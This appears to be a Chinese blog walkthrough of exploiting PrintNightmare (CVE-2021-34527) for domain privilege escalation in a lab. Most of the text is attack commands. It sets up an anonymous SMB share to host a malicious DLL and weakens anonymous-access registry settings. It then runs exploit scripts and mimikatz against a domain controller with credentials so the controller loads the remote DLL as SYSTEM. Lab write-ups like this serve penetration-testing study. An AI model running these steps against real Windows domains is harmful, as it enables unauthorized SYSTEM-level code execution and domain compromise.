CVE-2021-34527: PrintNightmare 域内提权

  • 域控 ip:192.168.72.21,hostname:dc01

  • 域内攻击者机器 ip:192.168.72.158,hostname:WIN10-01

  • 攻击者 kali 机器 ip:192.168.72.162

如果目标机器开启 Print Spooler 服务,那么此漏洞允许攻击者将代码注入到 Print Spooler 服务的进程 spoolsv.exe 中,以 system 权限执行。

漏洞实验

检测是否开放MS-RPRN服务
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
linux创建smb服务

目的是为了让目标访问到Evil.dll

修改SMB配置文件/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
user share allow guests = yes
idmap config* : backend=tdb
smb ports=445
​
[smb]
comment=Samba 
path=/tmp/
guest ok=yes
read only=no
browsable=yes

启动smb服务

#启动smb服务
service smbd start
service smbd status
windows创建smb服务
mkdir C:\share\
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
CVE-2021-1675.py 脚本攻击
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll
​
python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21

这里可以看到我的环境下虽然能上传 dll,但是加载不了。

 

mimikatz攻击
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll"
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值